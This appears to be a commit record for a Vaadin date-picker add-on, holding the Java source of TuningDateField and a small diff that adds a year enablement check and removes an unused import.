(cellItemCustomizer != null) { return cellItemCustomizer.isEnabled(year, this); } return true; } /** * Returns the week header names in the order of appearance in the calendar.<br /> * Ex for {@link Locale#FRANCE} : [lun., mar., mer., jeu., ven., sam., dim.] Ex for {@link Locale#US} : [Sun, Mon, * Tue, Wed, Thu, Fri, Sat] * * @param locale * the locale * @return the week header names in the order of appearance in the calendar. */ protected String[] getWeekDayNames(Locale locale) { String[] weekHeaderNames = new String[7]; String[] weekDays = DateFormatSymbols.getInstance(locale).getShortWeekdays(); int firstDayOfWeek = getFirstDayOfWeek(locale); for (int i = 0; i < 7; i++) { weekHeaderNames[i] = weekDays[(firstDayOfWeek + i) % 7 + 1]; } return weekHeaderNames; } /** * Gets the first day of the week, in the given locale. * * @param locale * the locale * @return a value in the range of {@link DateTimeConstants#MONDAY} to {@link DateTimeConstants#SUNDAY}. */ private final int getFirstDayOfWeek(Locale locale) { Calendar calendar; if (locale != null) { calendar = Calendar.getInstance(locale); } else { calendar = Calendar.getInstance(); } return ((calendar.getFirstDayOfWeek() + 5) % 7) + 1; } /** * Gets the last day of the week, in the given locale. * * @param locale * the locale * @return a value in the range of {@link DateTimeConstants#MONDAY} to {@link DateTimeConstants#SUNDAY}. 
*/ private final int getLastDayOfWeek(Locale locale) { Calendar calendar; if (locale != null) { calendar = Calendar.getInstance(locale); } else { calendar = Calendar.getInstance(); } return ((calendar.getFirstDayOfWeek() + 4) % 7) + 1; } public static final Method DATE_CHANGE_METHOD = ReflectTools.findMethod(DateChangeListener.class, "dateChange", DateChangeEvent.class); public void addDateChangeListener(DateChangeListener listener) { addListener(DateChangeEvent.class, listener, DATE_CHANGE_METHOD); } public void removeDateChangeListener(DateChangeListener listener) { removeListener(DateChangeEvent.class, listener, DATE_CHANGE_METHOD); } public static final Method MONTH_CHANGE_METHOD = ReflectTools.findMethod(MonthChangeListener.class, "monthChange", MonthChangeEvent.class); public void addMonthChangeListener(MonthChangeListener listener) { addListener(MonthChangeEvent.class, listener, MONTH_CHANGE_METHOD); } public void removeMonthChangeListener(MonthChangeListener listener) { removeListener(MonthChangeEvent.class, listener, MONTH_CHANGE_METHOD); } public static final Method YEAR_CHANGE_METHOD = ReflectTools.findMethod(YearChangeListener.class, "yearChange", YearChangeEvent.class); public void addYearChangeListener(YearChangeListener listener) { addListener(YearChangeEvent.class, listener, YEAR_CHANGE_METHOD); } public void removeYearChangeListener(YearChangeListener listener) { removeListener(YearChangeEvent.class, listener, YEAR_CHANGE_METHOD); } @Override public Class<? extends String> getType() { return String.class; } /** * @return the monthDisplayed */ public YearMonth getYearMonthDisplayed() { return yearMonthDisplayed; } /** * @param yearMonthDisplayed * the yearMonthDisplayed to set */ public void setYearMonthDisplayed(YearMonth yearMonthDisplayed) { this.yearMonthDisplayed = yearMonthDisplayed; this.yearDisplayed = yearMonthDisplayed.getYear(); markAsDirty(); } /** * @return the yearDisplayed */ public Integer getYearDisplayed() { return yearDisplayed; } /** * @param yearDisplayed * the yearDisplayed to set */ public void setYearDisplayed(Integer yearDisplayed) { this.yearDisplayed = yearDisplayed; markAsDirty(); } /** * @return the dateTimeFormatter */ public DateTimeFormatter getDateTimeFormatter() { return dateTimeFormatter; } /** * @param dateTimeFormatter * the dateTimeFormatter to set */ public void setDateTimeFormatter(final DateTimeFormatter dateTimeFormatter) { this.dateTimeFormatter = dateTimeFormatter; defaultDateTimeFormatter = false; } /** * @return the weekendDisabled */ public boolean isWeekendDisabled() { return weekendDisabled; } /** * @param weekendDisabled * the weekendDisabled to set */ public void setWeekendDisabled(boolean weekendDisabled) { this.weekendDisabled = weekendDisabled; } /** * @return the calendarResolution */ public CalendarResolution getCalendarResolution() { return calendarResolution; } /** * @param calendarResolution * the calendarResolution to set */ public void setCalendarResolution(CalendarResolution calendarResolution) { this.calendarResolution = calendarResolution; } /** * @return the controlsEnabled */ public boolean isControlsEnabled() { return controlsEnabled; } /** * @param controlsEnabled * the controlsEnabled to set */ public void setControlsEnabled(boolean controlsEnabled) { this.controlsEnabled = controlsEnabled; } /** * @return the cellItemCustomizer */ public CellItemCustomizer getCellItemCustomizer() { return cellItemCustomizer; } /** * @param cellItemCustomizer * the cellItemCustomizer to set */ public void 
setCellItemCustomizer(CellItemCustomizer cellItemCustomizer) { this.cellItemCustomizer = cellItemCustomizer; } }
tuning-datefield/src/main/java/org/vaadin/addons/tuningdatefield/TuningDateField.java
/* * Copyright (C) 2013 Frederic Dreyfus * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.vaadin.addons.tuningdatefield; import java.lang.reflect.Method; import java.text.DateFormatSymbols; import java.util.Arrays; import java.util.Calendar; import java.util.Locale; import org.joda.time.DateTimeConstants; import org.joda.time.Days; import org.joda.time.LocalDate; import org.joda.time.Months; import org.joda.time.YearMonth; import org.joda.time.format.DateTimeFormat; import org.joda.time.format.DateTimeFormatter; import org.vaadin.addons.tuningdatefield.event.DateChangeEvent; import org.vaadin.addons.tuningdatefield.event.DateChangeListener; import org.vaadin.addons.tuningdatefield.event.MonthChangeEvent; import org.vaadin.addons.tuningdatefield.event.MonthChangeListener; import org.vaadin.addons.tuningdatefield.event.YearChangeEvent; import org.vaadin.addons.tuningdatefield.event.YearChangeListener; import org.vaadin.addons.tuningdatefield.widgetset.client.TuningDateFieldRpc; import org.vaadin.addons.tuningdatefield.widgetset.client.TuningDateFieldState; import org.vaadin.addons.tuningdatefield.widgetset.client.ui.calendar.CalendarItem; import org.vaadin.addons.tuningdatefield.widgetset.client.ui.calendar.CalendarResolution; import com.google.gwt.thirdparty.guava.common.base.Objects; import com.vaadin.data.Property; import com.vaadin.data.util.converter.Converter; import com.vaadin.data.util.converter.Converter.ConversionException; import com.vaadin.data.validator.RangeValidator; import com.vaadin.ui.AbstractField; import com.vaadin.ui.TextField; import com.vaadin.util.ReflectTools; /** * A date picker with a Joda {@link LocalDate} as model.<br /> * <p> * Usage:<br /> * * <pre> * TuningDateField tuningDateField = new TuningDateField(); * tuningDateField.setLocale(Locale.US); // optional * // A null range means no limit * tuningDateField.setDateRange(new LocalDate(2013, MAY, 10), new LocalDate(2013, JUNE, 5), &quot;The date must be between &quot; * + startDate + &quot; and &quot; + endDate); * tuningDateField.setLocalDate(new LocalDate(2013, MAY, 15)); * tuningDateField.setCellItemCustomizer(myTuningDateFieldCustomizer); // To customize cells of calendar * </pre> * * </p> * * <p> * The {@link TuningDateField} displays a {@link TextField} with proper LocalDate converter and a toggle button to * display a calendar.<br /> * The default converter will use a short format . You can set your own formatter using * {@link #setDateTimeFormatter(DateTimeFormatter)}. * </p> * <p> * To acess the {@link LocalDate} value of this field use the {@link #getLocalDate()} method which will return * <code>null</code> if the text value is null or if it is invalid. * </p> * * <p> * You can customize cells of the calendar using the {@link CellItemCustomizer} and its convenient default * {@link CellItemCustomizerAdapter}. 
<br /> * Example of a customizer which will apply even style to even days and odd styles for odd days in the calendar with * {@link CalendarResolution#DAY} resolution.<br /> * It will also disable the 25th of December 2013: * * <pre> * public class MyTuningDateFieldCustomizer extends TuningDateFieldCustomizerAdapter { * * &#064;Override * public String getStyle(LocalDate date, TuningDateField calendar) { * return date.getDayOfMonth() % 2 == 0 ? &quot;even&quot; : &quot;odd&quot;; * } * * &#064;Override * public boolean isEnabled(LocalDate date, TuningDateField calendar) { * if (date.equals(new LocalDate(2013, DECEMBER, 25))) { * return false; * } else { * return true; * } * } * } * </pre> * * </p> * * <p> * The primary stylename of the calendar is </code>tuning-datefield-calendar</code><br /> * <br /> * * CSS styles for calendar {@link CalendarResolution#DAY} : * <ul> * <li>today : if cell represents the current day</li> * <li>selected : if cell represents the selected day</li> * <li>currentmonth : if cell represents a day on current calendar month</li> * <li>previousmonth : if cell represents a day on previous calendar month</li> * <li>nextmonth : if cell represents a day on next calendar month</li> * <li>weekend : if cell represents a week-end</li> * <li>enabled : if cell is enabled</li> * <li>disabled : if cell is disabled</li> * </ul> * * CSS styles for calendar {@link CalendarResolution#MONTH} : * <ul> * <li>selected : if cell represents the selected month</li> * <li>currentmonth : if cell represents a day on current calendar month</li> * <li>enabled : if cell is enabled</li> * <li>disabled : if cell is disabled</li> * </ul> * * CSS styles for calendar {@link CalendarResolution#YEAR} : * <ul> * <li>selected : if cell represents the selected month</li> * <li>currentyear : if cell represents a day on current calendar month</li> * <li>enabled : if cell is enabled</li> * <li>disabled : if cell is disabled</li> * </ul> * * </p> * * * @author Frederic.Dreyfus * */ public class TuningDateField extends AbstractField<String> { private static final long serialVersionUID = 5261965803349750329L; /** * The cell item customizer which allows to customize calendar cells. */ private CellItemCustomizer cellItemCustomizer; /** * The date range validator if a range is defined * * @see #setDateRange(LocalDate, LocalDate, String) */ private RangeValidator<LocalDate> dateRangeValidator; // private boolean dayPicker = true; private CalendarResolution calendarResolution = CalendarResolution.DAY; /** * A dateTimeFormatter for parsing/printing dates. A default {@link DateTimeFormatter} is defined with short format * for current locale. This can be overriden using {@link #setDateTimeFormatter(DateTimeFormatter)} */ private DateTimeFormatter dateTimeFormatter; // True if the dateTimeFormatter is the default one and not a user defined private boolean defaultDateTimeFormatter = true; // Internal uses : the following 4 values are computed once at init and if the locale changes. private String[] monthTexts; // Jan, Feb, Mar private String[] shortMonthTexts; // Jan, Feb, Mar private String[] weekDayNames; // Sun, Mon, Tue, ... private int firstDayOfWeek; // 1 in France (monday), 7 in the US (sunday) private int lastDayOfWeek; // 7 in France (sunday), 6 in the US (saturday) /** * True to disable weekends. 
* * @see #setWeekendDisabled(boolean) */ private boolean weekendDisabled = true; /** * True to enable/disabled controls * * @see #setControlsEnabled(boolean) */ private boolean controlsEnabled = true; // Internal use : the month currently displayed in the calendar private YearMonth yearMonthDisplayed; // Internal use : the year currently displayed in the calendar private int yearDisplayed; // Internal use private boolean calendarOpen; public TuningDateField() { init(); setValue(null); } public TuningDateField(String caption) { this(); setCaption(caption); init(); } public TuningDateField(Property<?> dataSource) { this(null, dataSource); } public TuningDateField(String caption, Property<?> dataSource) { init(); setCaption(caption); setPropertyDataSource(dataSource); } public TuningDateField(String caption, LocalDate value) { init(); setCaption(caption); setLocalDate(value); } private void init() { setupLocaleBasedStaticData(getLocale()); initConverter(); setYearMonthDisplayed(YearMonth.now()); registerTuningDateFieldRpc(); addValueChangeListener(new ValueChangeListener() { private static final long serialVersionUID = -8632906562585439165L; @Override public void valueChange(com.vaadin.data.Property.ValueChangeEvent event) { fireEvent(new DateChangeEvent(TuningDateField.this, (LocalDate) getConvertedValue())); } }); } /** * Initialize the {@link LocalDate} converter for the text field. */ private void initConverter() { Converter<String, LocalDate> converter = new Converter<String, LocalDate>() { private static final long serialVersionUID = -2161506497954814519L; @Override public LocalDate convertToModel(String value, Class<? extends LocalDate> targetType, Locale locale) throws com.vaadin.data.util.converter.Converter.ConversionException { if (value == null) { return null; } LocalDate modelValue = null; try { modelValue = dateTimeFormatter.parseLocalDate(value); } catch (IllegalArgumentException e) { throw new ConversionException("Cannot convert to model"); } return modelValue; } @Override public String convertToPresentation(LocalDate value, Class<? extends String> targetType, Locale locale) throws com.vaadin.data.util.converter.Converter.ConversionException { if (value == null) { return null; } String presentationValue = null; try { presentationValue = dateTimeFormatter.print(value); } catch (IllegalArgumentException e) { throw new ConversionException("Cannot convert to presentation"); } return presentationValue; } @Override public Class<LocalDate> getModelType() { return LocalDate.class; } @Override public Class<String> getPresentationType() { return String.class; } }; setConverter(converter); } private void registerTuningDateFieldRpc() { registerRpc(new TuningDateFieldRpc() { private static final long serialVersionUID = 3572898507878457932L; @Override public void onCalendarOpen() { TuningDateField.this.onCalendarOpen(); markAsDirty(); } @Override public void onCalendarClosed() { calendarOpen = false; markAsDirty(); } @Override public void calendarItemClicked(Integer relativeDateIndex) { onCalendarItemClicked(relativeDateIndex); } @Override public void dateTextChanged(String dateText) { setValue(dateText); } @Override public void previousControlClicked() { if (controlsEnabled) { goToPreviousCalendarPage(); } else { // wtf ? should never happen } } @Override public void nextControlClicked() { if (controlsEnabled) { goToNextCalendarPage(); } else { // wtf ? 
should never happen } } @Override public void resolutionControlClicked() { if (controlsEnabled) { swithToHigherCalendarResolution(); } else { // wtf ? should never happen } } }); } public void setLocale(Locale locale) { super.setLocale(locale); // reinitialize static data based on locale (monthText, day names, etc...) boolean localeModified = Objects.equal(getLocale(), locale); if (localeModified) { setupLocaleBasedStaticData(locale); } } private void setupLocaleBasedStaticData(Locale locale) { if (locale == null) { locale = Locale.getDefault(); } if (defaultDateTimeFormatter) { dateTimeFormatter = DateTimeFormat.shortDate().withLocale(locale); } monthTexts = new DateFormatSymbols(locale).getMonths(); shortMonthTexts = new DateFormatSymbols(locale).getShortMonths(); firstDayOfWeek = getFirstDayOfWeek(locale); lastDayOfWeek = getLastDayOfWeek(locale); weekDayNames = getWeekDayNames(locale); } /** * Sets the date range of this tuningDateField * * @param startDate * the start date (included) * @param endDate * the end date (included) */ public void setDateRange(LocalDate startDate, LocalDate endDate, String errorMessage) { if (endDate.isBefore(startDate)) { throw new IllegalArgumentException("Cannot have a date range with end date " + endDate + " before start date " + startDate); } // set validator for date range if (dateRangeValidator != null) { removeValidator(dateRangeValidator); } dateRangeValidator = new RangeValidator<LocalDate>(errorMessage, LocalDate.class, startDate, endDate); addValidator(dateRangeValidator); markAsDirty(); } /** * Returns <code>true</code> if : * <ol> * <li>date is in range</li> * <li>date is not a week-end, or if it is then week-ends are not disabled</li> * <li>date is not disabled by {@link CellItemCustomizer}</li> * </ol> * * @param date * the date * @return <code>true</code> if date is enabled, else returns <code>false</code> */ protected boolean isDateEnabled(LocalDate date) { boolean enabled = false; enabled = isDateInRange(date); if (!enabled) { return enabled; } if (isWeekend(date) && isWeekendDisabled()) { return false; } if (enabled && cellItemCustomizer != null) { enabled = cellItemCustomizer.isEnabled(date, this); } return enabled; } /** * Returns <code>true</code> if date is in range, else returns <code>false</code> * * @param date * the date. * @return <code>true</code> if date is in range, else returns <code>false</code> */ private boolean isDateInRange(LocalDate date) { if (dateRangeValidator == null) { return true; } else { return dateRangeValidator.isValid(date); } } /** * <code>true</code> if date is a week-end, else returns <code>false</code>. <br /> * Override this method for custom week-ends days. 
* * @param date * the date * @return <code>true</code> if date is a week-end, else returns <code>false</code> */ protected boolean isWeekend(LocalDate date) { return date.getDayOfWeek() >= DateTimeConstants.SATURDAY; } @Override public TuningDateFieldState getState() { return (TuningDateFieldState) super.getState(); } @Override public void beforeClientResponse(boolean initial) { super.beforeClientResponse(initial); // For days of first week that are in previous month // Get first day of week of last week's previous month if (getValue() != null) { getState().setDisplayedDateText(getValue()); } getState().setCalendarOpen(calendarOpen); // We send calendar state only if it's open if (calendarOpen) { getState().setControlsEnabled(controlsEnabled); getState().setCalendarResolution(calendarResolution); if (calendarResolution.equals(CalendarResolution.DAY)) { YearMonth yearMonthDisplayed = getYearMonthDisplayed(); String displayedMonthText = monthTexts[yearMonthDisplayed.getMonthOfYear() - 1]; getState().setCalendarResolutionText(displayedMonthText + " " + yearMonthDisplayed.getYear()); getState().setWeekHeaderNames(weekDayNames); getState().setCalendarItems(buildDayItems()); } else if (calendarResolution.equals(CalendarResolution.MONTH)) { getState().setCalendarItems(buildMonthItems()); getState().setCalendarResolutionText(Integer.toString(yearMonthDisplayed.getYear())); } else if (calendarResolution.equals(CalendarResolution.YEAR)) { getState().setCalendarItems(buildYearItems()); getState().setCalendarResolutionText(getCalendarFirstYear() + " - " + getCalendarLastYear()); } } } private CalendarItem[] buildDayItems() { LocalDate calendarFirstDay = getCalendarFirstDay(); LocalDate calendarLastDay = getCalendarLastDay(); LocalDate firstDayOfMonth = yearMonthDisplayed.toLocalDate(1); LocalDate lastDayOfMonth = yearMonthDisplayed.toLocalDate(1).dayOfMonth().withMaximumValue(); LocalDate today = LocalDate.now(); int numberOfDays = Days.daysBetween(calendarFirstDay, calendarLastDay).getDays() + 1; LocalDate date = calendarFirstDay; CalendarItem[] calendarItems = new CalendarItem[numberOfDays]; LocalDate currentValue = getLocalDate(); for (int i = 0; i < numberOfDays; i++, date = date.plusDays(1)) { calendarItems[i] = new CalendarItem(); calendarItems[i].setIndex(i); calendarItems[i].setRelativeDateIndex(date.getDayOfMonth()); calendarItems[i].setText(Integer.toString(date.getDayOfMonth())); StringBuilder style = new StringBuilder(); if (date.equals(today)) { style.append("today "); } if (currentValue != null && date.equals(currentValue)) { style.append("selected "); } if (date.isBefore(firstDayOfMonth)) { style.append("previousmonth "); calendarItems[i].setEnabled(false); } else if (date.isAfter(lastDayOfMonth)) { style.append("nextmonth "); calendarItems[i].setEnabled(false); } else { style.append("currentmonth "); calendarItems[i].setEnabled(true); } if (isWeekend(date)) { style.append("weekend "); } if (cellItemCustomizer != null) { String generatedStyle = cellItemCustomizer.getStyle(date, this); if (generatedStyle != null) { style.append(generatedStyle); style.append(" "); } String tooltip = cellItemCustomizer.getTooltip(date, this); if (tooltip != null) { calendarItems[i].setTooltip(tooltip); } } if (isDateEnabled(date)) { calendarItems[i].setEnabled(true); } else { calendarItems[i].setEnabled(false); } String computedStyle = style.toString(); if (!computedStyle.isEmpty()) { calendarItems[i].setStyle(computedStyle); } } return calendarItems; } private CalendarItem[] buildMonthItems() { YearMonth 
calendarFirstMonth = getCalendarFirstMonth(); YearMonth calendarLastMonth = getCalendarLastMonth(); YearMonth currentMonth = YearMonth.now(); int numberOfMonths = Months.monthsBetween(calendarFirstMonth, calendarLastMonth).getMonths() + 1; CalendarItem[] calendarItems = new CalendarItem[numberOfMonths]; YearMonth month = calendarFirstMonth; LocalDate currentValue = getLocalDate(); YearMonth currentYearMonthValue = currentValue == null ? null : new YearMonth(currentValue.getYear(), currentValue.getMonthOfYear()); for (int i = 0; i < numberOfMonths; i++, month = month.plusMonths(1)) { calendarItems[i] = new CalendarItem(); calendarItems[i].setIndex(i); calendarItems[i].setRelativeDateIndex(month.getMonthOfYear()); calendarItems[i].setEnabled(true); // By default StringBuilder style = new StringBuilder(""); if (month.equals(currentMonth)) { style.append("currentmonth "); } if (currentYearMonthValue != null && month.equals(currentYearMonthValue)) { style.append("selected "); } if (cellItemCustomizer != null) { String generatedStyle = cellItemCustomizer.getStyle(month, this); if (generatedStyle != null) { style.append(generatedStyle); style.append(" "); } String tooltip = cellItemCustomizer.getTooltip(month, this); if (tooltip != null) { calendarItems[i].setTooltip(tooltip); } } if (isMonthEnabled(month)) { calendarItems[i].setEnabled(true); } String computedStyle = style.toString(); if (!computedStyle.isEmpty()) { calendarItems[i].setStyle(computedStyle); } calendarItems[i].setText(shortMonthTexts[i]); } return calendarItems; } private CalendarItem[] buildYearItems() { int calendarFirstYear = getCalendarFirstYear(); int calendarLastYear = getCalendarLastYear(); int currentYear = YearMonth.now().getYear(); int numberOfYears = calendarLastYear - calendarFirstYear + 1; CalendarItem[] calendarItems = new CalendarItem[numberOfYears]; int year = calendarFirstYear; LocalDate currentValue = getLocalDate(); Integer currentYearValue = currentValue == null ? null : currentValue.getYear(); for (int i = 0; i < numberOfYears; i++, year++) { calendarItems[i] = new CalendarItem(); calendarItems[i].setIndex(i); calendarItems[i].setRelativeDateIndex(year); calendarItems[i].setEnabled(true); StringBuilder style = new StringBuilder(""); if (year == currentYear) { style.append("currentyear "); } if (currentYearValue != null && year == currentYearValue) { style.append("selected "); } // FIXME missing isYearEnabled if (cellItemCustomizer != null) { String generatedStyle = cellItemCustomizer.getStyle(year, this); if (generatedStyle != null) { style.append(generatedStyle); style.append(" "); } String tooltip = cellItemCustomizer.getTooltip(year, this); if (tooltip != null) { calendarItems[i].setTooltip(tooltip); } } String computedStyle = style.toString(); if (!computedStyle.isEmpty()) { calendarItems[i].setStyle(computedStyle); } calendarItems[i].setText(Integer.toString(year)); } return calendarItems; } /** * Sets the localDate value of this field. * * @param localDate * the localDate */ public void setLocalDate(LocalDate localDate) { setConvertedValue(localDate); } /** * As the value of the field is a String, the representation may be corrupted to be parsed into a {@link LocalDate}. * In that case we return <code>null</code>. * * @return the localDate value of this field if defined and valid, else returns <code>null</code>. 
*/ public LocalDate getLocalDate() { try { return (LocalDate) getConvertedValue(); } catch (ConversionException e) { // In that case the value is invalid return null; } } /** * @return the first day of the calendar. As there are 7 columns displayed, if the first day of month is not in the * first column, we fill previous column items with days of previous month. */ private LocalDate getCalendarFirstDay() { LocalDate firstDayOfMonth = yearMonthDisplayed.toLocalDate(1); int calendarFirstDayOfWeek = firstDayOfWeek; int numberOfDaysSinceFirstDayOfWeek = (firstDayOfMonth.getDayOfWeek() - calendarFirstDayOfWeek + 7) % 7; return firstDayOfMonth.minusDays(numberOfDaysSinceFirstDayOfWeek); } /** * @return the last day of the calendar. As there are 7 columns displayed, if the last day of month is not in the * last column, we fill next column items with days of next month. */ private LocalDate getCalendarLastDay() { LocalDate lastDayOfMonth = yearMonthDisplayed.toLocalDate(1).dayOfMonth().withMaximumValue(); int calendarLastDayOfWeek = lastDayOfWeek; int numberOfDaysUntilLastDayOfWeek = (calendarLastDayOfWeek - lastDayOfMonth.getDayOfWeek() + 7) % 7; return lastDayOfMonth.plusDays(numberOfDaysUntilLastDayOfWeek); } private YearMonth getCalendarFirstMonth() { return new YearMonth(yearDisplayed, 1); } private YearMonth getCalendarLastMonth() { return new YearMonth(yearDisplayed, 12); } /** * If current year displayed is 1954, the range is 1949-1960 */ private int getCalendarFirstYear() { return yearDisplayed - yearDisplayed % 10 - 1; } /** * If current year displayed is 1954, the range is 1949-1960 */ private int getCalendarLastYear() { return yearDisplayed - yearDisplayed % 10 + 10; } private LocalDate getSelectedDate(int dayOfMonth) { return yearMonthDisplayed.toLocalDate(dayOfMonth); } private YearMonth getSelectedMonth(int monthOfYear) { return new YearMonth(yearDisplayed, monthOfYear); } /** * Called when the calendar is open on client-side */ private void onCalendarOpen() { calendarResolution = CalendarResolution.DAY; LocalDate currentValue = getLocalDate(); if (currentValue != null) { yearMonthDisplayed = new YearMonth(currentValue); } else { yearMonthDisplayed = YearMonth.now(); } calendarOpen = true; } /** * Called when user clicked on cell item * * @param relativeDateIndex * is dayOfMonth in day resolution, monthOfYear in month resolution, year in year resolution */ protected void onCalendarItemClicked(int relativeDateIndex) { if (calendarResolution.equals(CalendarResolution.DAY)) { if (isDateEnabled(getSelectedDate(relativeDateIndex))) { // We check the date is not disabled LocalDate selectedDate = getSelectedDate(relativeDateIndex); setConvertedValue(selectedDate); // Should now close the calendar calendarOpen = false; } } else if (calendarResolution.equals(CalendarResolution.MONTH)) { if (isMonthEnabled(getSelectedMonth(relativeDateIndex))) { YearMonth selectedMonth = getSelectedMonth(relativeDateIndex); setYearMonthDisplayed(selectedMonth); setCalendarResolution(CalendarResolution.DAY); fireEvent(new MonthChangeEvent(this, selectedMonth)); } } else if (calendarResolution.equals(CalendarResolution.YEAR)) { // FIXME : isYearEnabled setYearMonthDisplayed(new YearMonth(relativeDateIndex, getYearMonthDisplayed().getMonthOfYear())); setCalendarResolution(CalendarResolution.MONTH); } } /** * Called when user clicked on the next page control */ public void goToNextCalendarPage() { if (calendarResolution.equals(CalendarResolution.DAY)) { setYearMonthDisplayed(yearMonthDisplayed.plusMonths(1)); 
fireEvent(new MonthChangeEvent(this, yearMonthDisplayed)); } else if (calendarResolution.equals(CalendarResolution.MONTH)) { setYearMonthDisplayed(yearMonthDisplayed.plusYears(1)); fireEvent(new YearChangeEvent(this, yearDisplayed)); } else if (calendarResolution.equals(CalendarResolution.YEAR)) { setYearMonthDisplayed(yearMonthDisplayed.plusYears(10)); } } /** * Called when user clicked on the previous page control */ public void goToPreviousCalendarPage() { if (calendarResolution.equals(CalendarResolution.DAY)) { setYearMonthDisplayed(yearMonthDisplayed.minusMonths(1)); fireEvent(new MonthChangeEvent(this, yearMonthDisplayed)); } else if (calendarResolution.equals(CalendarResolution.MONTH)) { setYearMonthDisplayed(yearMonthDisplayed.minusYears(1)); fireEvent(new YearChangeEvent(this, yearDisplayed)); } else if (calendarResolution.equals(CalendarResolution.YEAR)) { setYearMonthDisplayed(yearMonthDisplayed.minusYears(10)); } } /** * Called when user clicked on the resolution control */ public void swithToHigherCalendarResolution() { if (calendarResolution.equals(CalendarResolution.DAY)) { setCalendarResolution(CalendarResolution.MONTH); } else if (calendarResolution.equals(CalendarResolution.MONTH)) { setCalendarResolution(CalendarResolution.YEAR); } markAsDirty(); } /** * Returns true if month is enabled. Default implementations returns monthCustomizer value if any. * * @param yearMonth * @return true if month is enabled. */ protected boolean isMonthEnabled(YearMonth yearMonth) { if (cellItemCustomizer != null) { return cellItemCustomizer.isEnabled(yearMonth, this); } return true; } /** * Returns the week header names in the order of appearance in the calendar.<br /> * Ex for {@link Locale#FRANCE} : [lun., mar., mer., jeu., ven., sam., dim.] Ex for {@link Locale#US} : [Sun, Mon, * Tue, Wed, Thu, Fri, Sat] * * @param locale * the locale * @return the week header names in the order of appearance in the calendar. */ protected String[] getWeekDayNames(Locale locale) { String[] weekHeaderNames = new String[7]; String[] weekDays = DateFormatSymbols.getInstance(locale).getShortWeekdays(); int firstDayOfWeek = getFirstDayOfWeek(locale); for (int i = 0; i < 7; i++) { weekHeaderNames[i] = weekDays[(firstDayOfWeek + i) % 7 + 1]; } return weekHeaderNames; } /** * Gets the first day of the week, in the given locale. * * @param locale * the locale * @return a value in the range of {@link DateTimeConstants#MONDAY} to {@link DateTimeConstants#SUNDAY}. */ private final int getFirstDayOfWeek(Locale locale) { Calendar calendar; if (locale != null) { calendar = Calendar.getInstance(locale); } else { calendar = Calendar.getInstance(); } return ((calendar.getFirstDayOfWeek() + 5) % 7) + 1; } /** * Gets the last day of the week, in the given locale. * * @param locale * the locale * @return a value in the range of {@link DateTimeConstants#MONDAY} to {@link DateTimeConstants#SUNDAY}. 
*/ private final int getLastDayOfWeek(Locale locale) { Calendar calendar; if (locale != null) { calendar = Calendar.getInstance(locale); } else { calendar = Calendar.getInstance(); } return ((calendar.getFirstDayOfWeek() + 4) % 7) + 1; } public static final Method DATE_CHANGE_METHOD = ReflectTools.findMethod(DateChangeListener.class, "dateChange", DateChangeEvent.class); public void addDateChangeListener(DateChangeListener listener) { addListener(DateChangeEvent.class, listener, DATE_CHANGE_METHOD); } public void removeDateChangeListener(DateChangeListener listener) { removeListener(DateChangeEvent.class, listener, DATE_CHANGE_METHOD); } public static final Method MONTH_CHANGE_METHOD = ReflectTools.findMethod(MonthChangeListener.class, "monthChange", MonthChangeEvent.class); public void addMonthChangeListener(MonthChangeListener listener) { addListener(MonthChangeEvent.class, listener, MONTH_CHANGE_METHOD); } public void removeMonthChangeListener(MonthChangeListener listener) { removeListener(MonthChangeEvent.class, listener, MONTH_CHANGE_METHOD); } public static final Method YEAR_CHANGE_METHOD = ReflectTools.findMethod(YearChangeListener.class, "yearChange", YearChangeEvent.class); public void addYearChangeListener(YearChangeListener listener) { addListener(YearChangeEvent.class, listener, YEAR_CHANGE_METHOD); } public void removeYearChangeListener(YearChangeListener listener) { removeListener(YearChangeEvent.class, listener, YEAR_CHANGE_METHOD); } @Override public Class<? extends String> getType() { return String.class; } /** * @return the monthDisplayed */ public YearMonth getYearMonthDisplayed() { return yearMonthDisplayed; } /** * @param yearMonthDisplayed * the yearMonthDisplayed to set */ public void setYearMonthDisplayed(YearMonth yearMonthDisplayed) { this.yearMonthDisplayed = yearMonthDisplayed; this.yearDisplayed = yearMonthDisplayed.getYear(); markAsDirty(); } /** * @return the yearDisplayed */ public Integer getYearDisplayed() { return yearDisplayed; } /** * @param yearDisplayed * the yearDisplayed to set */ public void setYearDisplayed(Integer yearDisplayed) { this.yearDisplayed = yearDisplayed; markAsDirty(); } /** * @return the dateTimeFormatter */ public DateTimeFormatter getDateTimeFormatter() { return dateTimeFormatter; } /** * @param dateTimeFormatter * the dateTimeFormatter to set */ public void setDateTimeFormatter(final DateTimeFormatter dateTimeFormatter) { this.dateTimeFormatter = dateTimeFormatter; defaultDateTimeFormatter = false; } /** * @return the weekendDisabled */ public boolean isWeekendDisabled() { return weekendDisabled; } /** * @param weekendDisabled * the weekendDisabled to set */ public void setWeekendDisabled(boolean weekendDisabled) { this.weekendDisabled = weekendDisabled; } /** * @return the calendarResolution */ public CalendarResolution getCalendarResolution() { return calendarResolution; } /** * @param calendarResolution * the calendarResolution to set */ public void setCalendarResolution(CalendarResolution calendarResolution) { this.calendarResolution = calendarResolution; } /** * @return the controlsEnabled */ public boolean isControlsEnabled() { return controlsEnabled; } /** * @param controlsEnabled * the controlsEnabled to set */ public void setControlsEnabled(boolean controlsEnabled) { this.controlsEnabled = controlsEnabled; } /** * @return the cellItemCustomizer */ public CellItemCustomizer getCellItemCustomizer() { return cellItemCustomizer; } /** * @param cellItemCustomizer * the cellItemCustomizer to set */ public void 
setCellItemCustomizer(CellItemCustomizer cellItemCustomizer) { this.cellItemCustomizer = cellItemCustomizer; } }
Added year enablement check
tuning-datefield/src/main/java/org/vaadin/addons/tuningdatefield/TuningDateField.java
Added year enablement check
<ide><path>uning-datefield/src/main/java/org/vaadin/addons/tuningdatefield/TuningDateField.java
<ide>
<ide> import java.lang.reflect.Method;
<ide> import java.text.DateFormatSymbols;
<del>import java.util.Arrays;
<ide> import java.util.Calendar;
<ide> import java.util.Locale;
<ide>
<ide> style.append("selected ");
<ide> }
<ide>
<del> // FIXME missing isYearEnabled
<add> if (isYearEnabled(year)) {
<add> calendarItems[i].setEnabled(true);
<add> }
<ide>
<ide> if (cellItemCustomizer != null) {
<ide> String generatedStyle = cellItemCustomizer.getStyle(year, this);
